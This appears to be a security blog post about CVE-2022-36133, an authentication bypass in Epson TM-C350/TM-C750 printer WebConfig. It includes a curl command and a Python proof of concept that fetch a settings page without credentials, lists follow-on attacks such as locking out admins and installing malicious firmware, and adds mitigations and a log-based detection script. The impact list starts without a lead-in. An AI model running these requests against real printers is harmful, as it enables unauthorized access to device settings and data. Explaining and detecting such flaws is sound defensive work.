Printer security may not be the flashiest topic in cybersecurity, but the consequences of a vulnerable printer can be severe. One such case is CVE-2022-36133, a flaw discovered in Epson’s popular industrial color label printers—the TM-C350 and TM-C750—running firmware version WAM31500. This vulnerability allowed an attacker to bypass authentication in the device's WebConfig interface, potentially taking full control over the printer.
In this post, we'll break down what CVE-2022-36133 is all about, how the exploit works (including code snippets), and what you can do if your business relies on these devices.
What is CVE-2022-36133?
CVE-2022-36133 is an authentication bypass found in the WebConfig feature of Epson TM-C350 and TM-C750 printers. WebConfig is a web interface used by administrators to configure and monitor these printers. When these printers run the vulnerable WAM31500 firmware, an attacker can access the WebConfig interface—even if authentication is required—by using crafted requests.
This means anyone on the same network (and sometimes even on the internet, if the device is exposed) could access settings, read print jobs, or even change the printer’s configuration.
Why Does This Matter?
While it might seem like just another bug, printers often store sensitive data—including print logs, network passwords, and sometimes even credentials. A compromised printer can be a stepping stone for attackers to gain further access into a corporate network, set up persistent attacks, or simply cause massive disruption by changing printer settings.
Let’s see what the typical login flow looks like for the Epson TM-C350/TM-C750 WebConfig portal:
GET /webconfig/
Host: [printer-ip]
This generally returns a login page. After you enter the username and password, the browser will POST them to an endpoint like /webconfig/login.cgi.
The Exploit: Authentication Bypass
CVE-2022-36133 exists because the WebConfig portal does not properly enforce authentication for certain endpoints. Specifically, it fails to require session cookies or tokens for settings pages, letting anyone simply visit URLs directly.
Suppose WebConfig has a configuration page at:
http://[printer-ip]/webconfig/settings.cgi
Even without logging in, an attacker can visit this URL and gain full access:
curl http://[printer-ip]/webconfig/settings.cgi
The server responds with the settings page—no authentication required!
Below is a Python script that fetches the WebConfig settings page without credentials:
import requests

# Set the IP of the target printer
printer_ip = '192.168.1.100'

# Target a settings page presumed to be protected
url = f'http://{printer_ip}/webconfig/settings.cgi'

# Plain GET with no cookies, tokens or credentials attached
response = requests.get(url)

if response.status_code == 200:
    print("Exploit Successful! Settings page contents:")
    print(response.text)
else:
    print(f"Failed to access page. Status code: {response.status_code}")
When run against a vulnerable device, this script will dump the settings page contents—proving authentication can be bypassed.
- Change Admin Credentials: Lock out legitimate administrators.
- Install Malicious Firmware: If firmware updates don’t require authentication, this could allow persistent compromise.
Mitigation Steps
- Update Firmware: Epson has reportedly patched this issue in a later firmware version. Visit Epson’s support page and search your model for firmware downloads.
- Network Segmentation: Ensure your printers are not directly accessible from untrusted networks or the internet.
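As an added example (not part of the original post and not Epson tooling), the sketch below is detection logic for the missing session check described above: it scans HTTP logs for WebConfig pages that answered 200 to a client with no recent login on that printer. The log format, the sample lines, the session lifetime and the treatment of a 200 on the login POST as a successful login are assumptions; the paths are the illustrative ones used in this post.

```python
import re
from datetime import datetime

# Constructed sample lines in an assumed proxy/sensor log format:
# timestamp client printer method path status
SAMPLE_LOG = """\
2022-11-25T09:00:01 10.0.5.20 192.168.1.100 GET /webconfig/ 200
2022-11-25T09:00:09 10.0.5.20 192.168.1.100 POST /webconfig/login.cgi 200
2022-11-25T09:00:12 10.0.5.20 192.168.1.100 GET /webconfig/settings.cgi 200
2022-11-25T09:14:40 10.0.9.77 192.168.1.100 GET /webconfig/settings.cgi 200
2022-11-25T09:15:02 10.0.9.78 192.168.1.100 GET /webconfig/settings.cgi 401
2022-11-25T10:30:00 10.0.5.20 192.168.1.100 GET /webconfig/settings.cgi 200
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (GET|POST) (\S+) (\d{3})$")
LOGIN_PATH = "/webconfig/login.cgi"         # illustrative login endpoint from the post
PUBLIC_PATHS = {"/webconfig/", LOGIN_PATH}  # pages expected to answer without a session
SESSION_TTL = 900                           # seconds; assumed session lifetime

def find_unauthenticated_access(log_text):
    """Return (timestamp, client, printer, path) for every protected WebConfig
    page served with 200 to a client that has no recent login on that printer."""
    last_login = {}  # (client, printer) -> time of last login POST answered 200
    findings = []
    for raw in log_text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue  # skip malformed lines
        ts, client, printer, method, path, status = m.groups()
        when = datetime.fromisoformat(ts)
        path = path.split("?", 1)[0]  # ignore any query string
        key = (client, printer)
        if method == "POST" and path == LOGIN_PATH and status == "200":
            last_login[key] = when  # assumption: 200 here means login succeeded
            continue
        if not path.startswith("/webconfig/") or path in PUBLIC_PATHS:
            continue
        if status != "200":
            continue  # 401/403/302: the device enforced authentication
        seen = last_login.get(key)
        if seen is None or (when - seen).total_seconds() > SESSION_TTL:
            findings.append((ts, client, printer, path))
    return findings

if __name__ == "__main__":
    for finding in find_unauthenticated_access(SAMPLE_LOG):
        print("ALERT unauthenticated WebConfig access:", finding)
```

On the constructed sample this flags the client that never logged in and the request made long after the assumed session lifetime, while the request that followed a login and the one answered with 401 are not reported.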
Final Thoughts
Printer security often goes overlooked, but as CVE-2022-36133 shows, even everyday workplace devices can pose a security risk. Always keep firmware up to date, never expose management interfaces to untrusted networks, and regularly audit your organization’s devices for vulnerabilities.
Stay safe, and don’t let your label printer be your weakest security link!
Timeline
Published on: 11/25/2022 06:15:00 UTC
Last modified on: 11/30/2022 20:49:00 UTC